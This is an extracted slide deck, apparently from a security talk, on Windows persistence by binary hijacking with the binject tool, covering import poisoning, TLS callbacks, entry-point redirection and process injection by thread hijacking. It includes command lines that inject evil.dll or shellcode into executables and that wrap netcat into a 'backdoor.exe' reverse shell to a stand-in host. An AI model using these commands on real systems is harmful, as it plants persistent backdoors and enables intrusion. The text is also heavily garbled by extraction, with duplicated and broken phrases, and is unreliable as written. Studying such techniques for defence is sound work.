Principal Consultant Nick Harbour nick.harbour@mandiant.com ick.harbour@mandiant.com @ THE BLACK ART OF BINARY HIJACKING HIJACKING
Agenda Agenda Agenda Agenda 2 2 � Overview of Persistence Techniques Overview of Persistence Techniques � Overview of Persistence Techniques Overview of Persistence Techniques � Binary Hijacking with Binary Hijacking with binject binject − Adding Sections Adding Sections − Entry Point Redirection Entry Point Redirection − Import Poisoning Import Poisoning − TLS Callbacks TLS Callbacks − Adding pre Adding pre- -made parasites made parasites � Process Injection Parasites � Process Injection Parasites Process Injection Parasites Process Injection Parasites � New Methods for Process Injection New Methods for Process Injection
3 Windows Persistence Techniques Windows Persistence Techniques Windows Persistence Techniques Windows Persistence Techniques 3 Technique Install Detect Startup Folders Very Easy Very Easy Registry Run Keys Very Easy Very Easy Windows Services Wi d S i E Easy M di Medium Other Registry Hijacks Medium Medium Binary Hijacking Difficult Difficult DLL Search Order Hijacking* Easy Very Difficult *For more info visit http://blog.mandiant.com/archives/1207
Introducing Binject Introducing Binject Introducing Binject Introducing Binject 4 4 � Very Simple Command Line Interface Very Simple Command Line Interface Very Simple Command Line Interface Very Simple Command Line Interface � Point Point- -and and- -shoot Binary Hijacking shoot Binary Hijacking � Add New Sections to a Binary Add New Sections to a Binary − Can Fully Rebuild PE binaries to make room Can Fully Rebuild PE binaries to make room � Redirect Entry Point to new Section Redirect Entry Point to new Section − Raw (no pointer on stack) Raw (no pointer on stack) − Relative or Absolute pointer to OEP on the Relative or Absolute pointer to OEP on the stack stack − DLL Support DLL Support
DLL Entry Point Redirection DLL Entry Point Redirection DLL Entry Point Redirection DLL Entry Point Redirection 5 5 push 0FFFF3392h push 0FFFF3392h Delta to OEP D l OEP pop eax call $+5 $ Get EIP add [esp], eax Pointer to OEP L ft Left on Stack St k … Your Shellcode Here … Your Shellcode Here ret ret Back to OEP O
Import Table Poisoning Import Table Poisoning Import Table Poisoning Import Table Poisoning 6 6 � Force a binary to load your DLL Force a binary to load your DLL � Force a binary to load your DLL Force a binary to load your DLL � Your DLL will load first Your DLL will load first � Useful for API Hooking, sandboxing Useful for API Hooking, sandboxing binject ‐ i clean.exe ‐ o hacked.exe –m evil.dll
Adding a TLS Callback Adding a TLS Callback Adding a TLS Callback Adding a TLS Callback 7 7 � The Thread Local Storage (TLS) provides a The Thread Local Storage (TLS) provides a g g ( ( ) p ) p mechanism to call a function on the following mechanism to call a function on the following events: events: − Process start P rocess start t t t t − Thread start hread start − DLL attach DLL attach DLL attach DLL attach − Thread terminate hread terminate − Process terminate Process terminate � Will Execute BEFORE the entry point of the Will Execute BEFORE the entry point of the binary binary � Only used if USER32.DLL is loaded O l O l Only used if USER32.DLL is loaded d if USER32 DLL i l d if USER32 DLL i l d d d d binject ‐ i clean exe ‐ o hacked exe –d shellcode bin ‐‐ tls binject ‐ i clean.exe ‐ o hacked.exe –d shellcode.bin ‐‐ tls
Utility Wrapping Utility Wrapping Utility Wrapping Utility Wrapping 8 8 � Add a fixed command line to a binary Add a fixed command line to a binary � Add a fixed command line to a binary Add a fixed command line to a binary − For example, hard code reverse shell switches For example, hard code reverse shell switches onto the netcat binary onto the netcat binary onto the netcat binary. onto the netcat binary. binject ‐ i nc.exe –o backdoor.exe –c “fake.com 7777 –e cmd.exe” � Coming soon, Add a fixed standard input Coming soon, Add a fixed standard input to a binary to a binary
Adding a Pre Adding a Pre Adding a Pre-Made Parasite Adding a Pre Made Parasite Made Parasite Made Parasite 9 9 � Shell Shell Code Payload Code Payload � Shell Shell-Code Payload Code Payload − Process Inject Shellcode into a Target Process Process Inject Shellcode into a Target Process CreateRemoteThread() method CreateRemoteThread() method method method � CreateRemoteThread() CreateRemoteThread() QueueUserAPC() method method � QueueUserAPC() � Main Thread Hijack method (new) Main Thread Hijack method (new) M i M i Th Th d Hij d Hij k k th d ( th d ( ) ) � Full EXE Payload Full EXE Payload − Dropper Dropper Dropper Dropper − In In- -Memory Process Replacement Memory Process Replacement
Basic Process Injection Techniques Basic Process Injection Techniques Basic Process Injection Techniques Basic Process Injection Techniques 10 10 � Memory must be allocated in remote Memory must be allocated in remote � Memory must be allocated in remote Memory must be allocated in remote process ( process ( VirtualAllocEx VirtualAllocEx ) � Data must be written to remote process D t Data must be written to remote process D t t b t b itt itt t t t t ( WriteProcessMemory WriteProcessMemory ) � Remote process must execute newly Remote process must execute newly Remote process must execute newly Remote process must execute newly written code written code
Controlling Execution Controlling Execution Controlling Execution Controlling Execution 11 11 � CreateRemoteThread() CreateRemoteThread() CreateRemoteThread() CreateRemoteThread() − Forces a new thread to be created at a Forces a new thread to be created at a location of your choosing location of your choosing location of your choosing location of your choosing − Most Most traditional, well traditional, well- -known known approach approach − Always freakin’ works Al Al Always freakin’ works f f ki ’ ki ’ k k � QueueUserAPC QueueUserAPC() () − Force the process to add an asynchronous Force the process to add an asynchronous procedure call (APC) of your choosing procedure call (APC) of your choosing − Process must use APC style of programming Process must use APC style of programming (hint: services.exe uses this) (hint: services.exe uses this)
Thread Hijacking Thread Hijacking Thread Hijacking – New Technique Thread Hijacking New Technique New Technique New Technique 12 12 � Find a thread to hijack Find a thread to hijack j j � Suspend the thread Suspend the thread � Save the thread context with Save the thread context with G t h GetThreadContext() GetThreadContext() G t h dC dC t t t() t() � Allocate space for your code and a stack Allocate space for your code and a stack � Write your code to the process Write o r code to the process Write o r code to the process Write your code to the process SetThreadContext() with EIP pointing to your with EIP pointing to your � SetThreadContext() code and ESP pointing to the new stack code and ESP pointing to the new stack code and ESP pointing to the new stack code and ESP pointing to the new stack � ResumeThread() ResumeThread() � Wait for the thread to suspend Wait for the thread to suspend p SetThreadContext() back to the original back to the original � SetThreadContext() � ResumeThread() ResumeThread() () ()
Notes on Thread Hijacking Notes on Thread Hijacking Notes on Thread Hijacking Notes on Thread Hijacking 13 13 � Less memory forensic residue Less memory forensic residue � Less memory forensic residue Less memory forensic residue − Thread is launched from valid executable Thread is launched from valid executable range as opposed to remotely range as opposed to remotely range as opposed to remotely range as opposed to remotely � Injected code needs to suspend its thread Injected code needs to suspend its thread when finished when finished
Demo and Q&A Demo and Q&A Demo and Q&A Demo and Q&A 14 14 � nick.harbour@mandiant.com nick.harbour@mandiant.com � nick harbour@mandiant com nick harbour@mandiant com � nickharbour@gmail.com nickharbour@gmail.com � Twitter: @nickharbour Twitter: @nickharbour @ � Website: www.rnicrosoft.net Website: www.rnicrosoft.net
Recommend
More recommend